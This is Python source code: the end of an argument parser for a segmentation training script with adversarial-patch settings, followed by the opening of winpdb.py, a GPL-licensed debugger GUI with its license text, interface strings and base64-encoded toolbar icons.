parser.add_argument('-c', '--classes', default=19, type=int)
parser.add_argument('-s', '--crop-size', default=0, type=int)
parser.add_argument('--step', type=int, default=200)
parser.add_argument('--arch')
parser.add_argument('--batch-size', type=int, default=64, metavar='N',
help='input batch size for training (default: 64)')
parser.add_argument('--epochs', type=int, default=10, metavar='N',
help='number of epochs to train (default: 10)')
parser.add_argument('--lr', type=float, default=0.01, metavar='LR',
help='learning rate (default: 0.01)')
parser.add_argument('--lr-mode', type=str, default='step')
parser.add_argument('--momentum', type=float, default=0.9, metavar='M',
help='SGD momentum (default: 0.9)')
parser.add_argument('--weight-decay', '--wd', default=1e-4, type=float,
metavar='W', help='weight decay (default: 1e-4)')
parser.add_argument('-e', '--evaluate', dest='evaluate',
action='store_true',
help='evaluate model on validation set')
# parser.add_argument('-tb', '--tb')
parser.add_argument('--resume', default='', type=str, metavar='PATH',
help='path to latest checkpoint (default: none)')
parser.add_argument('--pretrained', dest='pretrained',
default='', type=str, metavar='PATH',
help='use pre-trained model')
parser.add_argument('-j', '--workers', type=int, default=8)
parser.add_argument('--load-release', dest='load_rel', default=None)
parser.add_argument('--phase', default='val')
parser.add_argument('--random-scale', default=0, type=float)
parser.add_argument('--random-rotate', default=0, type=int)
parser.add_argument('--bn-sync', action='store_true')
parser.add_argument('--ms', action='store_true',
help='Turn on multi-scale testing')
parser.add_argument('--with-gt', action='store_true')
parser.add_argument('--test-suffix', default='', type=str)
parser.add_argument('--starting', type=int, default=None)
parser.add_argument('--ending', type=int, default=None)
parser.add_argument('--K', type=int, default=10)
parser.add_argument('--gpus', type=str, default='3,4')
parser.add_argument('--tb', default=0, type=int, help='tensorboard')
parser.add_argument('--outname', default='result/result_', type=str, help='tensorboard')
parser.add_argument('--patchmode', default=0, type=int, help='tensorboard')
parser.add_argument('--std', default=1, type=float, help='tensorboard')
parser.add_argument('--database', default='dag', type=str, help='tensorboard')
parser.add_argument('--use_cuda', default='True', type=str, help='tensorboard')
parser.add_argument('--interval', type=int, default=1)
parser.add_argument('--attack-iteration', type=int, default=100)
parser.add_argument('--loss-interval', type=int, default=2)
parser.add_argument('--patch-size', type=int, default=128)
parser.add_argument('--coefficient', type=float, default=0.05)
parser.add_argument('--clip', type=float, default=0.1)
parser.add_argument('--threshold', type=float, default=1.0)
parser.add_argument('--bound-type', type=str, default='l2')
parser.add_argument('--random_gaussian', type=float, default=0.5)
parser.add_argument('--bound-threshold', type=float, default=0.06)
args = parser.parse_args()
assert args.data_dir is not None
assert args.classes > 0
# print(' '.join(sys.argv))
print(args)
if args.bn_sync:
drn.BatchNorm = batchnormsync.BatchNormSync
path = split(args.outname)[0]
if not exists(path):
os.makedirs(path)
return args
def main():
args = parse_args()
if args.cmd == 'train':
train_seg(args)
elif args.cmd == 'test':
test_seg(args)
if __name__ == '__main__':
main()
|
winpdb.py
|
#! /usr/bin/env python
"""
winpdb.py
A GUI for rpdb2.py
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with this program; if not, write to the Free Software Foundation, Inc.,
51 Franklin Street, Fifth Floor, Boston, MA 02111-1307 USA
"""
ABOUT_NOTICE = """Winpdb is a platform independent GPL Python debugger with support for
multiple threads, namespace modification, embedded debugging,
encrypted communication and is up to 20 times faster than pdb.
Copyright (C) 2005-2009 Nir Aides
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
Credits:
Work on version 1.4.8 was sponsored by Investortools, Inc."""
LICENSE_NOTICE = """
This program is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation; either version 2 of the License, or any later
version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
See the GNU General Public License for more details.
A copy of the GPL with the precise terms and conditions for
copying, distribution and modification follow:
"""
COPY_OF_THE_GPL_LICENSE = """
TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
0.
This License applies to any program or other work which contains a notice
placed by the copyright holder saying it may be distributed under the terms
of this General Public License. The "Program", below, refers to any such
program or work, and a "work based on the Program" means either the Program
or any derivative work under copyright law: that is to say, a work containing
the Program or a portion of it, either verbatim or with modifications and/or
translated into another language. (Hereinafter, translation is included
without limitation in the term "modification".) Each licensee is addressed
as "you".
Activities other than copying, distribution and modification are not covered
by this License; they are outside its scope. The act of running the Program
is not restricted, and the output from the Program is covered only if its
contents constitute a work based on the Program (independent of having been
made by running the Program). Whether that is true depends on what the
Program does.
1.
You may copy and distribute verbatim copies of the Program's source code as
you receive it, in any medium, provided that you conspicuously and
appropriately publish on each copy an appropriate copyright notice and
disclaimer of warranty; keep intact all the notices that refer to this
License and to the absence of any warranty; and give any other recipients of
the Program a copy of this License along with the Program.
You may charge a fee for the physical act of transferring a copy, and you
may at your option offer warranty protection in exchange for a fee.
2.
You may modify your copy or copies of the Program or any portion of it, thus
forming a work based on the Program, and copy and distribute such modifications
or work under the terms of Section 1 above, provided that you also meet all
of these conditions:
a) You must cause the modified files to carry prominent notices stating
that you changed the files and the date of any change.
b) You must cause any work that you distribute or publish, that in whole
or in part contains or is derived from the Program or any part thereof,
to be licensed as a whole at no charge to all third parties under the
terms of this License.
c) If the modified program normally reads commands interactively when
run, you must cause it, when started running for such interactive use in
the most ordinary way, to print or display an announcement including an
appropriate copyright notice and a notice that there is no warranty (or
else, saying that you provide a warranty) and that users may redistribute
the program under these conditions, and telling the user how to view a
copy of this License. (Exception: if the Program itself is interactive
but does not normally print such an announcement, your work based on the
Program is not required to print an announcement.)
These requirements apply to the modified work as a whole. If identifiable
sections of that work are not derived from the Program, and can be reasonably
considered independent and separate works in themselves, then this License,
and its terms, do not apply to those sections when you distribute them as
separate works. But when you distribute the same sections as part of a whole
which is a work based on the Program, the distribution of the whole must be
on the terms of this License, whose permissions for other licensees extend to
the entire whole, and thus to each and every part regardless of who wrote it.
Thus, it is not the intent of this section to claim rights or contest your
rights to work written entirely by you; rather, the intent is to exercise the
right to control the distribution of derivative or collective works based on
the Program.
In addition, mere aggregation of another work not based on the Program with
the Program (or with a work based on the Program) on a volume of a storage or
distribution medium does not bring the other work under the scope of this
License.
3. You may copy and distribute the Program (or a work based on it, under
Section 2) in object code or executable form under the terms of Sections 1
and 2 above provided that you also do one of the following:
a) Accompany it with the complete corresponding machine-readable source
code, which must be distributed under the terms of Sections 1 and 2 above
on a medium customarily used for software interchange; or,
b) Accompany it with a written offer, valid for at least three years, to
give any third party, for a charge no more than your cost of physically
performing source distribution, a complete machine-readable copy of the
corresponding source code, to be distributed under the terms of Sections
1 and 2 above on a medium customarily used for software interchange; or,
c) Accompany it with the information you received as to the offer to
distribute corresponding source code. (This alternative is allowed only
for noncommercial distribution and only if you received the program in
object code or executable form with such an offer, in accord with
Subsection b above.)
The source code for a work means the preferred form of the work for making
modifications to it. For an executable work, complete source code means all
the source code for all modules it contains, plus any associated interface
definition files, plus the scripts used to control compilation and
installation of the executable. However, as a special exception, the source
code distributed need not include anything that is normally distributed (in
either source or binary form) with the major components (compiler, kernel,
and so on) of the operating system on which the executable runs, unless that
component itself accompanies the executable.
If distribution of executable or object code is made by offering access to
copy from a designated place, then offering equivalent access to copy the
source code from the same place counts as distribution of the source code,
even though third parties are not compelled to copy the source along with
the object code.
4. You may not copy, modify, sublicense, or distribute the Program except as
expressly provided under this License. Any attempt otherwise to copy, modify,
sublicense or distribute the Program is void, and will automatically
terminate your rights under this License. However, parties who have received
copies, or rights, from you under this License will not have their licenses
terminated so long as such parties remain in full compliance.
5. You are not required to accept this License, since you have not signed it.
However, nothing else grants you permission to modify or distribute the
Program or its derivative works. These actions are prohibited by law if you
do not accept this License. Therefore, by modifying or distributing the
Program (or any work based on the Program), you indicate your acceptance of
this License to do so, and all its terms and conditions for copying,
distributing or modifying the Program or works based on it.
6. Each time you redistribute the Program (or any work based on the Program),
the recipient automatically receives a license from the original licensor to
copy, distribute or modify the Program subject to these terms and conditions.
You may not impose any further restrictions on the recipients' exercise of
the rights granted herein. You are not responsible for enforcing compliance
by third parties to this License.
7. If, as a consequence of a court judgment or allegation of patent
infringement or for any other reason (not limited to patent issues),
conditions are imposed on you (whether by court order, agreement or otherwise)
that contradict the conditions of this License, they do not excuse you from
the conditions of this License. If you cannot distribute so as to satisfy
simultaneously your obligations under this License and any other pertinent
obligations, then as a consequence you may not distribute the Program at all.
For example, if a patent license would not permit royalty-free redistribution
of the Program by all those who receive copies directly or indirectly through
you, then the only way you could satisfy both it and this License would be to
refrain entirely from distribution of the Program.
If any portion of this section is held invalid or unenforceable under any
particular circumstance, the balance of the section is intended to apply and
the section as a whole is intended to apply in other circumstances.
It is not the purpose of this section to induce you to infringe any patents
or other property right claims or to contest validity of any such claims;
this section has the sole purpose of protecting the integrity of the free
software distribution system, which is implemented by public license
practices. Many people have made generous contributions to the wide range of
software distributed through that system in reliance on consistent
application of that system; it is up to the author/donor to decide if he or
she is willing to distribute software through any other system and a licensee
cannot impose that choice.
This section is intended to make thoroughly clear what is believed to be a
consequence of the rest of this License.
8. If the distribution and/or use of the Program is restricted in certain
countries either by patents or by copyrighted interfaces, the original
copyright holder who places the Program under this License may add an
explicit geographical distribution limitation excluding those countries,
so that distribution is permitted only in or among countries not thus
excluded. In such case, this License incorporates the limitation as if
written in the body of this License.
9. The Free Software Foundation may publish revised and/or new versions of
the General Public License from time to time. Such new versions will be
similar in spirit to the present version, but may differ in detail to
address new problems or concerns.
Each version is given a distinguishing version number. If the Program
specifies a version number of this License which applies to it and
"any later version", you have the option of following the terms and
conditions either of that version or of any later version published by the
Free Software Foundation. If the Program does not specify a version number
of this License, you may choose any version ever published by the
Free Software Foundation.
10. If you wish to incorporate parts of the Program into other free programs
whose distribution conditions are different, write to the author to ask for
permission. For software which is copyrighted by the Free Software
Foundation, write to the Free Software Foundation; we sometimes make
exceptions for this. Our decision will be guided by the two goals of
preserving the free status of all derivatives of our free software and of
promoting the sharing and reuse of software generally.
NO WARRANTY
11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR
THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE
STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE
PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND
PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE,
YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO
LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR
THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
POSSIBILITY OF SUCH DAMAGES.
END OF TERMS AND CONDITIONS
"""
import sys
WXVER = "2.6"
STR_WXPYTHON_ERROR_TITLE = 'Winpdb Error'
STR_WXPYTHON_ERROR_MSG = """wxPython was not found.
wxPython 2.6 or higher is required to run the winpdb GUI.
wxPython is the graphical user interface toolkit used by Winpdb.
You can find more information on wxPython at http://www.wxpython.org/
The Unicode version of wxPython is recommended for Winpdb.
To use the debugger without a GUI, run rpdb2."""
STR_X_ERROR_MSG = """It was not possible to start Winpdb.
A possible reason is that the X server (Windowing system) is not started.
Start the X server or try to use rpdb2 instead of winpdb."""
import rpdb2
if 'wx' not in sys.modules and 'wxPython' not in sys.modules:
try:
import wxversion
wxversion.ensureMinimal(WXVER)
except ImportError:
rpdb2._print(STR_WXPYTHON_ERROR_MSG, sys.__stderr__)
try:
import Tkinter
import tkMessageBox
Tkinter.Tk().wm_withdraw()
tkMessageBox.showerror(STR_WXPYTHON_ERROR_TITLE, STR_WXPYTHON_ERROR_MSG)
except:
pass
sys.exit(1)
import wx
assert wx.VERSION_STRING >= WXVER
import wx.lib.wxpTag
import wx.gizmos
import wx.html
import wx.lib.mixins.listctrl as listmix
import wx.stc as stc
import webbrowser
import traceback
import cStringIO
import threading
import xmlrpclib
import tempfile
import textwrap
import keyword
import weakref
import base64
import socket
import string
import codecs
import pickle
import Queue
import time
import os
import re
MARKER_BREAKPOINT_ENABLED = 5
MARKER_BREAKPOINT_DISABLED = 6
MARKER_CURRENT_LINE = 7
MARKER_CURRENT_LINE_HIT = 8
MARKER_CALL = 0
MARKER_LINE = 1
MARKER_RETURN = 2
MARKER_EXCEPTION = 3
MARKER_RUNNING = 4
MARKER_LIST = [MARKER_BREAKPOINT_ENABLED, MARKER_BREAKPOINT_DISABLED, MARKER_CURRENT_LINE, MARKER_CURRENT_LINE_HIT, MARKER_CALL, MARKER_LINE, MARKER_RETURN, MARKER_EXCEPTION, MARKER_RUNNING]
CAPTION_SOURCE = "Source"
CAPTION_CONSOLE = "Console"
CAPTION_THREADS = "Threads"
CAPTION_STACK = "Stack"
CAPTION_NAMESPACE = "Namespace"
CONSOLE_PROMPT = "\n> "
CONSOLE_COMPLETIONS = '\nAvailable completions:\n%s'
COMPLETIONS_NOTICE = 'NEW: Use CTRL-N for auto completion in the following commands: launch, eval and exec.'
COMPLETIONS_WARNING = '\nDisplay all %d possibilities? (y or n)'
COMPLETIONS_WARNING_CONFIRM_CHARS = ['y', 'Y']
COMPLETIONS_WARNING_THRESHOLD = 32
ENABLED = True
DISABLED = False
WINPDB_WILDCARD = "Python source (*.py;*.pyw)|*.py;*.pyw|All files (*)|*"
PYTHON_WARNING_TITLE = "Python Interpreter Warning"
PYTHON_WARNING_MSG = """Winpdb was started with the wrong Python interpreter version.
Winpdb path is:
%s
Python interpreter path is:
%s"""
MSG_WARNING_TRAP = "Are you sure that you want to disable the trapping of unhandled exceptions? If you click Yes unhandled exceptions will not be caught."
MSG_WARNING_UNHANDLED_EXCEPTION = "An unhandled exception was caught. Would you like to analyze it?"
MSG_WARNING_TITLE = "Warning"
MSG_WARNING_TEMPLATE = "%s\n\nClick 'Cancel' to ignore this warning in this session."
MSG_ERROR_TITLE = "Error"
MSG_ERROR_FILE_NOT_FOUND = "File not found."
MSG_ERROR_FILE_NOT_PYTHON = "'%s' does not seem to be a Python source file. Only Python files are accepted."
STR_FILE_LOAD_ERROR = "Failed to load source file '%s' from debuggee."
STR_FILE_LOAD_ERROR2 = """Failed to load source file '%s' from debuggee.
You may continue to debug, but you will not see
source lines from this file."""
STR_BLENDER_SOURCE_WARNING = "You attached to a Blender Python script. To be able to see the script's source you need to load it into the Blender text window and launch the script from there."
STR_EMBEDDED_WARNING = "You attached to an embedded debugger. Winpdb may become unresponsive during periods in which the Python interpreter is inactive."
STR_EXIT_WARNING = """The debugger is attached to a script. Would you like to stop the script?
If you click 'No' the debugger will attempt to detach before exiting."""
STR_WXPYTHON_ANSI_WARNING_TITLE = 'wxPython ANSI Warning'
STR_WXPYTHON_ANSI_WARNING_MSG = """The version of wxPython that was found does not support Unicode. wxPython is the graphical user interface toolkit used by Winpdb. You may experience some functionality limitations when debugging Unicode programs with this version of wxPython. If you need to debug Unicode programs it is recommended that you install the Unicode version of wxPython. You can find more information on wxPython at http://www.wxpython.org/"""
STR_MORE_ABOUT_BREAKPOINTS = """You can set conditional breakpoints with the 'bp' console command, disable or enable specific breakpoints with the 'bd' and 'be' commands and even load and save different sets of breakpoints with the 'load' and 'save' console commands. To learn more about these commands type 'help <command>' at the console prompt."""
STR_HOW_TO_JUMP = """You can jump to a different line in the current scope with the 'jump' console command. Type 'help jump' at the console prompt for more information."""
DLG_EXPR_TITLE = "Enter Expression"
DLG_ENCODING_TITLE = "Encoding"
DLG_SYNCHRONICITY_TITLE = "Synchronicity"
DLG_PWD_TITLE = "Password"
DLG_OPEN_TITLE = "Open Source"
DLG_LAUNCH_TITLE = "Launch"
DLG_ATTACH_TITLE = "Attach"
STATIC_EXPR = """The new expression will be evaluated at the debuggee
and its value will be set to the item."""
CHECKBOX_ENCODING = "Output non ASCII characters as an escape sequence."
STATIC_ENCODING = """The specified encoding is used as source encoding for the name-space viewer and for the exec and eval console commands. Valid values are either 'auto' or an encoding known by the codecs module. If 'auto' is specified, the source encoding of the active scope will be used, which is utf-8 by default."""
STATIC_ENCODING_SPLIT = """The specified encoding is used as source encoding
for the name-space viewer and for the exec and
eval console commands. Valid values are either
'auto' or an encoding known by the codecs module.
If 'auto' is specified, the source encoding of
the active scope will be used, which is utf-8
by default."""
CHECKBOX_SYNCHRONICITY = "Use synchronicity."
STATIC_SYNCHRONICITY = """Traditional Python debuggers that use the inspected thread (usually the main thread) to query or modify the script name-space have to wait until the script hits a break-point. Synchronicity allows the debugger to query and modify the script name-space even if its threads are still running or blocked in C library code by using special worker threads. In some rare cases querying or modifying data in synchronicity can crash the script. For example in some Linux builds of wxPython querying the state of wx objects from a thread other than the GUI thread can crash the script. If this happens or if you want to restrict these operations to the inspected thread, turn synchronicity off."""
STATIC_SYNCHRONICITY_SPLIT = """Traditional Python debuggers that use the
inspected thread (usually the main thread) to
query or modify the script name-space have to
wait until the script hits a break-point.
Synchronicity allows the debugger to query
and modify the script name-space even if its
threads are still running or blocked in C
library code by using special worker threads.
In some rare cases querying or modifying data
in synchronicity can crash the script. For
example in some Linux builds of wxPython
querying the state of wx objects from a thread
other than the GUI thread can crash the script.
If this happens or if you want to restrict
these operations to the inspected thread,
turn synchronicity off."""
STATIC_PWD = """The password is used to secure communication between the debugger console and the debuggee. Debuggees with un-matching passwords will not appear in the attach query list."""
STATIC_PWD_SPLIT = """The password is used to secure communication
between the debugger console and the debuggee.
Debuggees with un-matching passwords will not
appear in the attach query list."""
STATIC_ATTACH_DESC = """Attach to a script (that has the debugger engine running) on local or remote machine:"""
STATIC_ATTACH_DESC_SPLIT = """Attach to a script (that has the debugger engine
running) on local or remote machine:"""
STATIC_LAUNCH_DESC = """Start a new debugging session:"""
STATIC_LAUNCH_ENV = """To set environment variables for the new script use the 'env' console command."""
STATIC_LAUNCH_ENV_SPLIT = """To set environment variables for the new script use the 'env'
console command."""
STATIC_OPEN = """The source file entered will be fetched from the debugee."""
LABEL_EXPR = "New Expression:"
LABEL_ENCODING = "Set encoding:"
LABEL_PWD = "Set password:"
LABEL_OPEN = "File name:"
LABEL_LAUNCH_COMMAND_LINE = "Command line:"
LABEL_ATTACH_HOST = "Host:"
LABEL_CONSOLE = "Command:"
BUTTON_LAUNCH_BROWSE = "Browse"
BUTTON_ATTACH_REFRESH = "Refresh"
CHECKBOX_LAUNCH = "Set working directory to the script folder."
HLIST_HEADER_PID = "PID"
HLIST_HEADER_FILENAME = "Filename"
HLIST_HEADER_TID = "TID"
HLIST_HEADER_NAME = "Name"
HLIST_HEADER_STATE = "State"
HLIST_HEADER_FRAME = "Frame"
HLIST_HEADER_LINENO = "Line"
HLIST_HEADER_FUNCTION = "Function"
HLIST_HEADER_PATH = "Path"
TLC_HEADER_NAME = "Name"
TLC_HEADER_REPR = "Repr"
TLC_HEADER_TYPE = "Type"
VERSION = (1, 4, 8, 0, 'Tychod')
WINPDB_TITLE = "Winpdb 1.4.8 - Tychod"
WINPDB_VERSION = "WINPDB_1_4_8"
WINPDB_SIZE = "winpdb_size"
WINPDB_MAXIMIZE = "winpdb_maximize"
SPLITTER_1_POS = "splitter_1_pos"
SPLITTER_2_POS = "splitter_2_pos"
SPLITTER_3_POS = "splitter_3_pos"
SPLITTER_4_POS = "splitter_4_pos"
WINPDB_SIZE_MIN = (640, 480)
WINPDB_SETTINGS_FILENAME = "winpdb_settings.cfg"
WINPDB_SETTINGS_DEFAULT = {
WINPDB_SIZE: (800, 600),
WINPDB_MAXIMIZE: False,
SPLITTER_1_POS: 190,
SPLITTER_2_POS: 294,
SPLITTER_3_POS: 382,
SPLITTER_4_POS: 305
}
AC_CHAR = "\t"
AC_EXIT = "Alt-X"
AC_ANALYZE = "F3"
AC_BREAK = "F4"
AC_GO = "F5"
AC_NEXT = "F6"
AC_STEP = "F7"
AC_GOTO = "F8"
AC_TOOGLE = "F9"
AC_RETURN = "F12"
ML_EMPTY = "<empty>"
ML_SEPARATOR = "<separator>"
ML_ROOT = "<root>"
ML_FILE = "&File"
ML_PWD = "&Password"
ML_LAUNCH = "&Launch"
ML_ATTACH = "&Attach"
ML_DETACH = "&Detach"
ML_STOP = "&Stop"
ML_RESTART = "&Restart"
ML_OPEN = "&Open Source"
ML_EXIT = "E&xit" + AC_CHAR + AC_EXIT
ML_BREAKPOINTS = "&Breakpoints"
ML_TOGGLE = "&Toggle" + AC_CHAR + AC_TOOGLE
ML_DISABLE = "&Disable All"
ML_ENABLE = "&Enable All"
ML_CLEAR = "&Clear All"
ML_LOAD = "&Load"
ML_SAVE = "&Save"
ML_MORE = "&More..."
ML_CONTROL = "&Control"
ML_ANALYZE = "&Toggle Analyze" + AC_CHAR + AC_ANALYZE
ML_GO = "&Go" + AC_CHAR + AC_GO
ML_BREAK = "&Break" + AC_CHAR + AC_BREAK
ML_STEP = "&Step Into" + AC_CHAR + AC_STEP
ML_NEXT = "&Next" + AC_CHAR + AC_NEXT
ML_RETURN = "&Return" + AC_CHAR + AC_RETURN
ML_GOTO = "Run to &Line" + AC_CHAR + AC_GOTO
ML_JUMP = "&Jump"
ML_WINDOW = "&Window"
ML_HELP = "&Help"
ML_WEBSITE = "&Website"
ML_SUPPORT = "&Support"
ML_DOCS = "&Online Docs"
ML_EXT_DOCS = "&External Docs"
ML_UPDATES = "&Check for Updates"
ML_LICENSE = "&License"
ML_ABOUT = "&About"
TB_GO = "Go"
TB_BREAK = "Break"
TB_STEP = "Step into"
TB_NEXT = "Next"
TB_RETURN = "Return"
TB_GOTO = "Run to line"
TB_FILTER = "Filter out methods and functions from classes and objects in the namespace viewer"
TB_EXCEPTION = "Toggle 'analyze exception' mode"
TB_ENCODING = "Set the source encoding for the name-space viewer and the exec/eval console commands"
TB_SYNCHRONICITY = "Set the synchronicity mode"
TB_TRAP = "Toggle 'trap unhandled exceptions' mode"
TB_FILTER_TEXT = " Filter: %s "
TB_ENCODING_TEXT = " Encoding: %s "
TB_SYNCHRONICITY_TEXT = " Synchronicity: %s "
COMMAND = "command"
TOOLTIP = "tooltip"
TEXT = "text"
DATA = "data"
DATA2 = "data2"
ID = "id"
LABEL = "label"
FORMAT = "format"
KEYS = "keys"
WIDTH = "width"
PWD_TIP = "Set connection password."
LAUNCH_TIP = "Launch a new debugged script."
ATTACH_TIP = "Attach to a debugged script."
DETACH_TIP = "Detach from debugged script."
STOP_TIP = "Shutdown the debugged script."
RESTART_TIP = "Restart the debugged script."
OPEN_TIP = "Open source file in the source viewer."
ANALYZE_TIP = "Toggle analyze exception mode."
BREAK_TIP = "Pause script for inspection."
GO_TIP = "Let script continue its run."
STEP_TIP = "Continue to the next code line, possibly in an inner scope."
NEXT_TIP = "Continue to the next code line in the current scope."
GOTO_TIP = "Continue to the line under the cursor."
RETURN_TIP = "Continue to the end of the current scope."
JUMP_TIP = "Jump to another line in the current scope."
WEBSITE_TIP = "Open the Winpdb homepage."
SUPPORT_TIP = "Open the Winpdb support web page."
DOCS_TIP = "Open the Winpdb online documentation web page."
EXT_DOCS_TIP = "Open the Winpdb external documentation web page."
UPDATES_TIP = "Check for updates in the Winpdb website."
TOGGLE_TIP = "Toggle breakpoint at cursor location."
DISABLE_TIP = "Disable all breakpoints."
ENABLE_TIP = "Enable all breakpoints."
CLEAR_TIP = "Clear all breakpoints."
LOAD_TIP = "Load breakpoints from file."
SAVE_TIP = "Save breakpoints to file."
MORE_TIP = "Learn more about Winpdb..."
TOOLTIP_UNLOCKED = "Communication channel is authenticated but NOT encrypted."
TOOLTIP_LOCKED = "Communication channel is authenticated AND encrypted."
TOOLBAR_BITMAP_SIZE = (23, 21)
BASE64_BREAK = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nUUlEQVQ4y2NgGAXDCjDik1QJnPKJgYGBl4GB4cOd9TmCULH3DAwMAshiuAATAct5obQAkpgAFjGy\nDKcIjBo+avgQMfwTlP6GJPYZTW4UjBQAAICvDiDQ+lb5AAAAAElFTkSuQmCC\n'
BASE64_GO = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA\nZElEQVQ4y2NgGAWkApXAKR8p0c9EQJ5PJXDKf1oZDvPBf5oZTq4FTCTGwX+aGU6qBUxkpqL/NDOc\nWAvINvzO+hxGmhhOjMFkGU6swSQbTorBJBlOqsFEG06OwcQkt0+jdQPVAQDJqB4mOx09ZwAAAABJ\nRU5ErkJggg==\n'
BASE64_STEP = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB\ni0lEQVQ4y92UO0sDURCFv9lNCNlK1KSxCIFIUgta+CittIlgp21Q2Ma/IdqIoPZWFq6FEOy10dIm\nkSURS0OsxDTJjoWbGJZssj4anerOcM65c2fmDvxVk2AgVzzUQOgeOAP2Xcdu/Ujcv8ACZoASsOHj\nHoBl17GffiQeuGgVuABM4BaYdx27E0XcGAVwHfsS2PPdOWAnauZGRNxJ33nlV8Vdx673uQvfFk+M\nZRJWKr9rpQu1EE6837HShZqVyu8mxjKJIDAWDJjx5Cki86qd2SjZqXqLIuadGU9mgfXQaUmm8kUR\n4xzV7bdG5Thk7rv26Dp2FsBKFbYQOVL11lqNqjOwLCJSAlCvfdVXbwnpQ7aXvY/v8kNqLjMAraZb\nDwjJMP8T/8EPa2h6yMTIsJcM4gfFX0eM5Kgf/RourloGSE5OT31lQfXwPn+guKIHH40xlr60/Xx8\nlx+6uKx0wQHy2mkvtpruy8isJ3LjYsaugerbc6U49Ieq522i3IgRK0fK2oiVUW7U8zb5N/YOEKSA\nXhG59Y4AAAAASUVORK5CYII=\n'
BASE64_NEXT = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB\nUUlEQVQ4y9WUMUvDQBTHf6m6hI4lOLgIWQIuFRHULoJOujh0c+jkYhY/hqBbFr+CDmdB6OhSKIiD\n4BCRQEEcSj5AskR0eYXjSNqkcelb7t4///vdy93jYFnDKmt0z4JfQ3oH7oHbSPlpLbhsYAPbwAVw\nLus/geNI+V+14MZGp8AjsAK8APuR8n90T2NReKT8J+BG0l3gyvQ0at7ZnTY/+Vd4pPyxlh7MhNuO\n17Id78F2vFTTUtFac/ZaK4TbjrcKDIAjoK152qINxFM69Mp7wA4QJHH4MRVlHsi3nt73Zu+LNs6D\nX8rYzymib3iIlG8V3MNmHtyVSl/NBZrmGiBrVq7DmyWOsZlTqVX0Jzo8KwHPCo7CmnehQ+maLdOk\nacNFu+Vaxk6Or2N4qj250sPPwAawl8ThRPR1YAR8A4dJHGaVK5dFXeBNYNMYidatAl7u+AMmh2gx\n02GtwwAAAABJRU5ErkJggg==\n'
BASE64_RETURN = 'iVBORw0KGgoAAAANSUhEUgAAABcAAAAVCAYAAACt4nWrAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB\ne0lEQVQ4y92TPUsDQRCGn8klhLsqqLlGMAjRS36AFn78AhsPol1aqzTiT0gnVpJGS7GzSCMEe1MJ\nYqkStBM0aCVJk9xY6Ek8Em8jCOJUO+w7z747swt/OfJ+TUftJX7zABkDYAHbwBqwDKSimla9ImPD\n835tBjgBFuO0gweIAdgGroD5ccAASQPjOx/gPrAHHLTqlftov6NgU/gmoMB6q145NXE8NNKZXNrJ\neruOW7gbdJb3a0dh7riFOyfr7aYzuXQc74tzK2UfI7Kk2l+I6A7DhWqwImJdWCl7Ftj4Dv75zu2s\n5yNSQrXabd8+RHSX4aLbvn1AtYpIyc56vhFcRLYANOidDelpZzAPNWFNbDhu8dFxi2r6qRy3qI5b\nfDRyDrg/+PmuKfz1B/BXM7hqA8CempuOI35qPmpi4Yruvw8psRoHDzVhzUjd1yEV6oCn/d5K97n1\nMtT1ZH5CrOQ5cNN5uvZNe44GQRmlKYnkyOtKItlAaWoQlPm38QY7vXb+uQlzowAAAABJRU5ErkJg\ngg==\n'
